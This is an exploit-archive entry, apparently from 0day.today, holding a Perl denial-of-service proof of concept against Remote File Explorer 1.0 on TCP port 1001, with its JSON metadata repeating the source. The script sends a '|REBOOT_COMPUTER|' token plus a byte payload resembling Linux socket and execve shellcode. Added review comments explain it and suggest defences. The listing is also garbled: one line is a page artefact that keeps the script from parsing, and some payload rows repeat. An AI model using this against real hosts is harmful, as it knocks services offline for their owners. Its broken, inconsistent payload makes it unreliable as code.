ID 1337DAY-ID-6009
Type zdt
Reporter basher13
Modified 2005-07-11T00:00:00
Description
Exploit for unknown platform in category dos / poc
=====================================================
Remote File Explorer <= 1.0 Denial of Service Exploit
=====================================================
#!/usr/local/bin/perl
#
# Remote File Explorer DoS Exploit
# ----------------------------------------
#
# Resolve host... [OK]
# [+] Connecting... [OK]
# Target locked
# Sending bad procedure... [OK]
# [+] Server DoS'ed
#
# Tested on Windows2000 SP4
# Info: infamous.2hell.com
#
# Summary: takes one host argument, opens a TCP connection to port 1001 on
# it, sends a single message (the ASCII token "|REBOOT_COMPUTER|" followed by
# a fixed run of binary bytes), echoes that message to STDOUT, waits one
# second and closes the socket. The progress lines quoted above are not
# printed by this code; its only output is the usage text or the raw message.
#
# NOTE(review): there is no `use strict` / `use warnings`; $ARGC, $sploit and
# $msg are undeclared package globals, and SOCK is a bareword filehandle.

# NOTE(review): the next line is a page artefact, not Perl. It looks like the
# hosting site's e-mail obfuscation replaced a statement that contained an
# '@'. As shown the listing does not parse, and $ARGC is not assigned
# anywhere else in it.
[email protected];
# Require exactly one argument (the target host); otherwise print usage and
# exit.
if ($ARGC !=1) {
print "Usage: $0 <host>\n";
print "Example: $0 127.0.0.1\n";
exit;
}
# `use` is processed at compile time, so Socket's functions and constants are
# available to the whole file even though the statement appears here.
use Socket;
my($remote,$port,$iaddr,$paddr,$proto);
$remote=$ARGV[0];
$port = "1001"; # default port for the server
# inet_aton() accepts a dotted quad or a hostname and returns undef when the
# name cannot be resolved, which triggers the die.
$iaddr = inet_aton($remote) or die "Error: $!";
$paddr = sockaddr_in($port, $iaddr) or die "Error: $!";
$proto = getprotobyname('tcp') or die "Error: $!";
# Plain TCP client socket; the connection carries no handshake or credentials
# before the message below is sent.
socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";
connect(SOCK, $paddr) or die "Error: $!";
# Message sent to the service: the printable token "|REBOOT_COMPUTER|"
# followed by a fixed byte string.
# NOTE(review): the byte string contains repeated "\xcd\x80" pairs (the x86
# encoding of `int 0x80`, the Linux system-call gate) and several of its
# 8-byte rows recur verbatim, while the header names Windows 2000 SP4 as the
# tested platform. The page does not state the root cause; presumably the
# service acts on the leading command token without authenticating the
# sender -- confirm against the product's protocol before relying on this.
# For defenders, the stable, matchable part of the message is the ASCII token
# at the start of a TCP payload to port 1001, and the practical mitigation is
# to restrict which hosts can reach that port.
$sploit = "|REBOOT_COMPUTER|".
"\xeb\x6e\x5e\x29\xc0\x89\x46\x10".
"\x40\x89\xc3\x89\x46\x0c\x40\x89".
"\x46\x08\x8d\x4e\x08\xb0\x66\xcd".
"\x40\x89\xc3\x89\x46\x0c\x40\x89".
"\x46\x08\x8d\x4e\x08\xb0\x66\xcd".
"\x80\x43\xc6\x46\x10\x10\x88\x46".
"\x08\x31\xc0\x31\xd2\x89\x46\x18".
"\xb0\x90\x66\x89\x46\x16\x8d\x4e".
"\x14\x89\x4e\x0c\x8d\x4e\x08\xb0".
"\x66\xcd\x80\x89\x5e\x0c\x43\x43".
"\xb0\x66\xcd\x80\x89\x56\x0c\x89".
"\x08\x31\xc0\x31\xd2\x89\x46\x18".
"\xb0\x90\x66\x89\x46\x16\x8d\x4e".
"\x14\x89\x4e\x0c\x8d\x4e\x08\xb0".
"\x56\x10\xb0\x66\x43\xcd\x80\x86".
"\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0".
"\x14\x89\x4e\x0c\x8d\x4e\x08\xb0".
"\x66\xcd\x80\x89\x5e\x0c\x43\x43".
"\xb0\x66\xcd\x80\x89\x56\x0c\x89".
"\x56\x10\xb0\x66\x43\xcd\x80\x86".
"\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0".
"\x3f\x41\xcd\x80\xb0\x3f\x41\xcd".
"\x80\x88\x56\x07\x89\x76\x0c\x87".
"\xf3\x8d\x4b\x0c\xb0\x0b\xcd\x80".
"\xe8\x8d\xff\xff";
$msg = $sploit;
# Echoes the raw message, non-printable bytes included, to STDOUT.
print $msg;
# One send() call on the connected socket; nothing is read back, so the
# script never checks how the server reacted.
send(SOCK, $msg, 0) or die "Cannot send query: $!";
sleep(1);
# The return value of close() is not checked.
close(SOCK);
exit;
# 0day.today [2018-04-08] #
{"published": "2005-07-11T00:00:00", "id": "1337DAY-ID-6009", "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for unknown platform in category dos / poc", "enchantments": {"score": {"value": 0.2, "vector": "NONE", "modified": "2018-04-08T01:47:52", "rev": 2}, "dependencies": {"references": [], "modified": "2018-04-08T01:47:52", "rev": 2}, "vulnersScore": 0.2}, "type": "zdt", "lastseen": "2018-04-08T01:47:52", "edition": 2, "title": "Remote File Explorer <= 1.0 Denial of Service Exploit", "href": "https://0day.today/exploit/description/6009", "modified": "2005-07-11T00:00:00", "bulletinFamily": "exploit", "viewCount": 6, "cvelist": [], "sourceHref": "https://0day.today/exploit/6009", "references": [], "reporter": "basher13", "sourceData": "=====================================================\r\nRemote File Explorer <= 1.0 Denial of Service Exploit\r\n=====================================================\r\n\r\n\r\n\r\n#!/usr/local/bin/perl\r\n#\r\n# Remote File Explorer DoS Exploit\r\n# ----------------------------------------\r\n#\r\n# Resolve host... [OK]\r\n# [+] Connecting... [OK]\r\n# Target locked\r\n# Sending bad procedure... 
[OK]\r\n# [+] Server DoS'ed\r\n#\r\n# Tested on Windows2000 SP4\r\n# Info: infamous.2hell.com\r\n\r\n\r\n[email\u00a0protected];\r\nif ($ARGC !=1) {\r\n print \"Usage: $0 <host>\\n\";\r\n print \"Example: $0 127.0.0.1\\n\";\r\n exit;\r\n}\r\nuse Socket;\r\n\r\nmy($remote,$port,$iaddr,$paddr,$proto);\r\n$remote=$ARGV[0];\r\n$port = \"1001\"; # default port for the server\r\n\r\n$iaddr = inet_aton($remote) or die \"Error: $!\";\r\n$paddr = sockaddr_in($port, $iaddr) or die \"Error: $!\";\r\n$proto = getprotobyname('tcp') or die \"Error: $!\";\r\n\r\nsocket(SOCK, PF_INET, SOCK_STREAM, $proto) or die \"Error: $!\";\r\nconnect(SOCK, $paddr) or die \"Error: $!\";\r\n\r\n$sploit = \"|REBOOT_COMPUTER|\".\r\n\"\\xeb\\x6e\\x5e\\x29\\xc0\\x89\\x46\\x10\".\r\n\"\\x40\\x89\\xc3\\x89\\x46\\x0c\\x40\\x89\".\r\n\"\\x46\\x08\\x8d\\x4e\\x08\\xb0\\x66\\xcd\".\r\n\"\\x40\\x89\\xc3\\x89\\x46\\x0c\\x40\\x89\".\r\n\"\\x46\\x08\\x8d\\x4e\\x08\\xb0\\x66\\xcd\".\r\n\"\\x80\\x43\\xc6\\x46\\x10\\x10\\x88\\x46\".\r\n\"\\x08\\x31\\xc0\\x31\\xd2\\x89\\x46\\x18\".\r\n\"\\xb0\\x90\\x66\\x89\\x46\\x16\\x8d\\x4e\".\r\n\"\\x14\\x89\\x4e\\x0c\\x8d\\x4e\\x08\\xb0\".\r\n\"\\x66\\xcd\\x80\\x89\\x5e\\x0c\\x43\\x43\".\r\n\"\\xb0\\x66\\xcd\\x80\\x89\\x56\\x0c\\x89\".\r\n\"\\x08\\x31\\xc0\\x31\\xd2\\x89\\x46\\x18\".\r\n\"\\xb0\\x90\\x66\\x89\\x46\\x16\\x8d\\x4e\".\r\n\"\\x14\\x89\\x4e\\x0c\\x8d\\x4e\\x08\\xb0\".\r\n\"\\x56\\x10\\xb0\\x66\\x43\\xcd\\x80\\x86\".\r\n\"\\xc3\\xb0\\x3f\\x29\\xc9\\xcd\\x80\\xb0\".\r\n\"\\x14\\x89\\x4e\\x0c\\x8d\\x4e\\x08\\xb0\".\r\n\"\\x66\\xcd\\x80\\x89\\x5e\\x0c\\x43\\x43\".\r\n\"\\xb0\\x66\\xcd\\x80\\x89\\x56\\x0c\\x89\".\r\n\"\\x56\\x10\\xb0\\x66\\x43\\xcd\\x80\\x86\".\r\n\"\\xc3\\xb0\\x3f\\x29\\xc9\\xcd\\x80\\xb0\".\r\n\"\\x3f\\x41\\xcd\\x80\\xb0\\x3f\\x41\\xcd\".\r\n\"\\x80\\x88\\x56\\x07\\x89\\x76\\x0c\\x87\".\r\n\"\\xf3\\x8d\\x4b\\x0c\\xb0\\x0b\\xcd\\x80\".\r\n\"\\xe8\\x8d\\xff\\xff\";\r\n\r\n\r\n$msg = $sploit;\r\nprint $msg;\r\nsend(SOCK, $msg, 0) or die \"Cannot send 
query: $!\";\r\nsleep(1);\r\nclose(SOCK);\r\nexit;\r\n\r\n\r\n\r\n\n# 0day.today [2018-04-08] #"}
{}